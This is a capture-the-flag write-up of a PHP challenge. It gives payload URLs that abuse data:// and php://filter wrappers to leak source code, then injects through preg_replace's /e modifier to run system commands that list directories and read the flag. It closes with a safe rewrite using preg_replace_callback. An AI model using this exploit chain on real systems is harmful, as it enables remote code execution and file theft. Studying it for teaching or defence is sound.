Here we construct the payload:
?text=data://text/plain,I%20have%20a%20dream&file=next.php
Rebuild the payload to read the source of next.php:
?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php
After base64-decoding we get:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

// Vulnerable: the /e modifier makes preg_replace eval() the replacement string,
// with the text matched by the first subpattern (\1) substituted into it as-is.
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

// Every GET parameter name becomes the pattern and its value the subject.
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

// Never called directly; only reachable through the eval'd replacement above.
function getFlag(){
    @eval($_GET['cmd']);
}
Looking at the code as a whole, the key is the /e modifier on preg_replace: the replacement string is evaluated as PHP after the text captured by the first subpattern is substituted in for \1. Since each GET parameter name is used as the pattern and its value as the subject, this is where PHP regular-expression subpatterns and backreferences come in.
Now construct the payload:
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls');
Go straight to listing the root directory:
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls ../../../../../');
Find the flag:
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat ../../../../../flag');
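For comparison, an added example (not the challenge's own code) of how complex() from next.php can keep its "lowercase the match" behaviour without the /e modifier: a preg_replace_callback callable receives the captured text as a plain string, so a value such as ${getFlag()} is never evaluated. The function name complexSafe and the inputs are assumptions constructed for this illustration.

```php
<?php
// Added example, not the challenge's own code: the same "lowercase the match"
// behaviour as complex() in next.php, rebuilt without the /e modifier.
// With /e, preg_replace evaluated the replacement as PHP, so a subject of
// ${getFlag()} reached eval. With a callback the match is only ever a string.
function complexSafe(string $re, string $str): string
{
    $pattern = '/(' . $re . ')/i';          // no /e: nothing is evaluated

    // A user-controlled pattern is still a risk (invalid regex, catastrophic
    // backtracking), so refuse patterns that do not compile before using them.
    if (@preg_match($pattern, '') === false) {
        throw new InvalidArgumentException('invalid pattern: ' . $re);
    }

    $out = preg_replace_callback(
        $pattern,
        static function (array $m): string {
            return strtolower($m[1]);       // \1 handled as a value, never as code
        },
        $str
    );

    // preg_* returns null on runtime failure (e.g. backtrack limit): fail closed.
    if ($out === null) {
        throw new RuntimeException('preg_replace_callback failed, error ' . preg_last_error());
    }
    return $out;
}

// Constructed inputs mirroring the write-up's request: key "\S*", value "${getFlag()}".
// The whole value is matched and lowercased; getFlag() is not called.
echo complexSafe('\S*', '${getFlag()}'), "\n";
echo complexSafe('DREAM', 'I have a DREAM'), "\n";
```

Running this on a PHP 7 or 8 CLI shows the first call returning the lowercased literal text, which is the behaviour next.php intended; on PHP 5.5+ the original /e form additionally emits a deprecation warning, and PHP 7.0 removed /e entirely.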